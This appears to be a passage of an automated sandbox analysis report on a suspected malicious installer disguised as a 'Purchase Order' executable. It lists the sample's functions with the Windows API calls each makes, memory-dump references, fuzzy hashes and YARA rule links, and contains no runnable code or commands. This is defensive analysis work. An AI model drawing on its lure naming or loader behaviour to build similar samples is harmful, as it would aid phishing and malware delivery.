                                              • Instruction ID: 732860e23109d101385e559ec06a1cde6071cd761d8e517fa4c79c7f2b675a05
                                              • Opcode Fuzzy Hash: feecde648e4e86c349c2181d42606f42c320c3d08ea0eac6231e50817e8518ef
                                              • Instruction Fuzzy Hash: 4421B031D00205EACF20AFA5CE48A9E7A70BF04358F64413BF511B51E0DBBD8981DA6E
                                              Function 70122A74 Relevance: 3.2, APIs: 2, Instructions: 156COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetFilePointer.KERNELBASE(00000000), ref: 70122B33
                                              • GetLastError.KERNEL32 ref: 70122C3A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2026022448.0000000070121000.00000020.00000001.01000000.00000004.sdmp, Offset: 70120000, based on PE: true
                                              • Associated: 00000000.00000002.2025997194.0000000070120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000000.00000002.2026073766.0000000070123000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000000.00000002.2026100149.0000000070125000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_70120000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: ErrorFileLastPointer
                                              • String ID:
                                              • API String ID: 2976181284-0
                                              • Opcode ID: 8736ddceef5e43880ee6933695d0797d855e11e6ada92e58b2d69e216c88d945
                                              • Instruction ID: 6a3cb09e6ee5022d3246d94fa42062c4e6e13c5d4266a4935cb4ac0db79b6b81
                                              • Opcode Fuzzy Hash: 8736ddceef5e43880ee6933695d0797d855e11e6ada92e58b2d69e216c88d945
                                              • Instruction Fuzzy Hash: CA518C72704204BFDB21DF61F842B9D3BB5EB14316F2044A9F50687E21D678A882CBA9
                                              Function 00402484 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B5
                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsh5948.tmp,00000000,00000011,00000002), ref: 00402557
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: CloseQueryValue
                                              • String ID:
                                              • API String ID: 3356406503-0
                                              • Opcode ID: 28dfcfb9a6f44a18c58c8206a7dfe2bd09e3a5ae6e90a5253dfd418af8ae02c6
                                              • Instruction ID: 794a7caf9ed311c3342b46d24488b6d71e3894ac8d4f1441d9e09f9d9ce2e922
                                              • Opcode Fuzzy Hash: 28dfcfb9a6f44a18c58c8206a7dfe2bd09e3a5ae6e90a5253dfd418af8ae02c6
                                              • Instruction Fuzzy Hash: A411A731D14205EBDF14DFA4CA585AE77B4EF44348F21843FE445B72C0D6B89A41EB59
                                              Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              • Opcode ID: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                              • Instruction ID: eaafb4699c1cdf5c6f59fde68eca766a765a16907ebce13606274643e5ac5f14
                                              • Opcode Fuzzy Hash: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                              • Instruction Fuzzy Hash: 8D0128316242209FE7095B789D05B6A3698E710715F14463FF851F62F1D678CC429B4C
                                              Function 00401E49 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                              Download Yara Rule
                                              APIs
                                              • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                              • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: Window$EnableShow
                                              • String ID:
                                              • API String ID: 1136574915-0
                                              • Opcode ID: 476e1375ed2ebf99e134ffac4da93d8f4435b4a70c73a61f3ceb60b83f009d87
                                              • Instruction ID: 8ee55578b336c0276868c1e88f1fd45be51d25fee0972e3c110634e7b38d832d
                                              • Opcode Fuzzy Hash: 476e1375ed2ebf99e134ffac4da93d8f4435b4a70c73a61f3ceb60b83f009d87
                                              • Instruction Fuzzy Hash: 8BE01A72E082008FE724ABA5AA495AD77B8EB90325B20847FE211F11D1DA7858419F69
                                              Function 00406694 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleA.KERNEL32(?,?,?,00403401,0000000A), ref: 004066A6
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                                • Part of subcall function 00406624: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040663B
                                                • Part of subcall function 00406624: wsprintfW.USER32 ref: 00406676
                                                • Part of subcall function 00406624: LoadLibraryExW.KERNEL32(?,00000000,?), ref: 0040668A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                              • String ID:
                                              • API String ID: 2547128583-0
                                              • Opcode ID: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                              • Instruction ID: 155b38c425e345f43688a0673e138072f65e923c2ca09dacbbabb210d44f0fbf
                                              • Opcode Fuzzy Hash: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                              • Instruction Fuzzy Hash: 50E0863250461156D31197709E4487762EC9B95750307483EF946F2091DB399C36A66D
                                              Function 00405DB0 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,80000000,00000003,?,00000006,?,0000000A), ref: 00405DB4
                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,?,0000000A), ref: 00405DD6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: File$AttributesCreate
                                              • String ID:
                                              • API String ID: 415043291-0
                                              • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                              • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                              • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                              • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                              Function 0040586E Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateDirectoryW.KERNELBASE(?,00000000,00403382,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004035D9,?,00000006,?,0000000A), ref: 00405874
                                              • GetLastError.KERNEL32(?,00000006,?,0000000A), ref: 00405882
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: CreateDirectoryErrorLast
                                              • String ID:
                                              • API String ID: 1375471231-0
                                              • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                              • Instruction ID: b5712d1dc6f90c91938fb9970759bfac189bcafefc635788875416fd9ee2894b
                                              • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                              • Instruction Fuzzy Hash: 2FC04C712155019ED7546F619F08B277A50EB60781F158839A946E10E0DB348465ED2D
                                              Function 004027EF Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D
                                                • Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: FilePointerwsprintf
                                              • String ID:
                                              • API String ID: 327478801-0
                                              • Opcode ID: 2074296acf118ace0f9b9ab2ab8615e2fe297c7dd6636d95e153eafbd2080ce7
                                              • Instruction ID: 7f9197a1b1888ebfd6de04269447b21ffcaf0972564048b2e7bc6ee4a29003df
                                              • Opcode Fuzzy Hash: 2074296acf118ace0f9b9ab2ab8615e2fe297c7dd6636d95e153eafbd2080ce7
                                              • Instruction Fuzzy Hash: 29E06D71E04104AAD710EBA5AE098AEB768DB84318B24407FF201B50D1CA7949119E2D
                                              Function 0040230C Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                              Download Yara Rule
                                              APIs
                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: PrivateProfileStringWrite
                                              • String ID:
                                              • API String ID: 390214022-0
                                              • Opcode ID: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
                                              • Instruction ID: c1725c34c84eed099ded2eadaed0aef72a921931f8640c1422412bc8ca1d20e4
                                              • Opcode Fuzzy Hash: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
                                              • Instruction Fuzzy Hash: 89E086315046246BEB1436F10F8DABF10589B54305B19053FBE46B61D7D9FC0D81526D
                                              Function 00406155 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 0040617E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                              • Instruction ID: dcb86bc894ab99bc20e37dc8a6176b737b641c0fdee4176656c7f25b47436c56
                                              • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                              • Instruction Fuzzy Hash: 75E0E6B2110109BEEF195F50DD0AD7B375DE704304F01452EFA06D4091E6B5AD315634
                                              Function 00401735 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                              Download Yara Rule
                                              APIs
                                              • SearchPathW.KERNELBASE(?,00000000,?,?,?,?,000000FF), ref: 00401749
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: PathSearch
                                              • String ID:
                                              • API String ID: 2203818243-0
                                              • Opcode ID: c0811cb59a621ebc69ef1af7074a37ada7c896faeab5dbfa84eb6157ad43e3d3
                                              • Instruction ID: 76b1046b3576aa71ae923c826af07df126468053c341a8b382c9c50c66927564
                                              • Opcode Fuzzy Hash: c0811cb59a621ebc69ef1af7074a37ada7c896faeab5dbfa84eb6157ad43e3d3
                                              • Instruction Fuzzy Hash: EFE0DF72700100EAE710DFA4DE48EAA33A8DF40368B30813AF611B60C0E6B4A9419B2D
                                              Function 00405E62 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WriteFile.KERNELBASE(00000000,00000000,?,?,00000000,?,?,004032FA,000000FF,00416A00,?,00416A00,?,?,?,00000000), ref: 00405E76
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: FileWrite
                                              • String ID:
                                              • API String ID: 3934441357-0
                                              • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                              • Instruction ID: 8754e0b6f25d564075f0081c534dd79b85a2df0f0bc88b3642164a4a3ec1e455
                                              • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                              • Instruction Fuzzy Hash: FDE0B63221065AAFDF109F95DC00AAB7B6CEB052A0F044437FD59E7150D671EA21DAE4
                                              Function 00405E33 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • ReadFile.KERNELBASE(00000000,00000000,?,?,00000000,?,?,00403344,00000000,00000000,00403168,?,?,00000000,00000000,00000000), ref: 00405E47
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                              • Instruction ID: bd732019988057c431ec21c3a2c50b1292625b962aa4d7912315599e48db2a91
                                              • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                              • Instruction Fuzzy Hash: A9E08C3220021AABCF20AF54DC00FEB3B6CEB05760F004832FD65E6040E230EA219BE8
                                              Function 70122997 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualProtect.KERNELBASE(7012405C,?,?,7012404C), ref: 701229B5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2026022448.0000000070121000.00000020.00000001.01000000.00000004.sdmp, Offset: 70120000, based on PE: true
                                              • Associated: 00000000.00000002.2025997194.0000000070120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000000.00000002.2026073766.0000000070123000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000000.00000002.2026100149.0000000070125000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_70120000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID:
                                              • API String ID: 544645111-0
                                              • Opcode ID: df73e84e165f64422224ea7611de563581444e4ece1058c121559a56ce6ec10f
                                              • Instruction ID: d198abd46eb146c1141f651b32aaa2d55a781a5dfafb9b0188e338ede322d12a
                                              • Opcode Fuzzy Hash: df73e84e165f64422224ea7611de563581444e4ece1058c121559a56ce6ec10f
                                              • Instruction Fuzzy Hash: DAF074B2704280FFC350CB6AAC447853BE0F344205B21453AF399D6A62E3B444C68B5D
                                              Function 0040234E Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040237F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
